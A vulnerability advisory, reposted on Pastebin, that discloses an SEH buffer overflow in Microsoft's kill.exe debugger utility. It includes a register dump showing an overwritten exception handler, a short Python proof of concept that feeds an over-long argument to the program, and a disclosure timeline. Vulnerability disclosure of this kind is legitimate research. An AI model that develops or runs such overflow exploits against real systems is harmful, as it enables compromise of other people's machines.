Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- '''
- [+] Credits: HYP3RLINX
- Vendor:
- =================
- www.microsoft.com
- Product:
- =========================================
- Microsoft Process Kill Utility "kill.exe"
- File version: 6.3.9600.17298
- The Kill tool (kill.exe), a tool used to terminate a process, part of the
- WinDbg program.
- Vulnerability Type:
- ===================
- Buffer Overflow
- SEH Buffer Overflow @ about 512 bytes
- Vulnerability Details:
- =====================
- Register dump
- 'SEH chain of main thread
- Address SE handler
- 001AF688 kernel32.756F489B
- 001AFBD8 52525252
- 42424242 *** CORRUPT ENTRY ***
- 001BF81C 41414141 AAAA
- 001BF820 41414141 AAAA
- 001BF824 41414141 AAAA
- 001BF828 41414141 AAAA
- 001BF82C 41414141 AAAA
- 001BF830 41414141 AAAA
- 001BF834 909006EB ë Pointer to next SEH record
- 001BF838 52525252 RRRR SE handler <================
- 001BF83C 90909090
- 001BF840 90909090
- Exploit code(s):
- ================
- Python POC.
- '''
- junk="A"*508+"RRRR"
- pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
- subprocess.Popen([pgm, junk], shell=False)
- '''
- Disclosure Timeline:
- ==================================
- Vendor Notification: June 24, 2016
- Vendor reply: Will not security service
- July 8, 2016 : Public Disclosure
- # 0day.today [2016-07-13] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
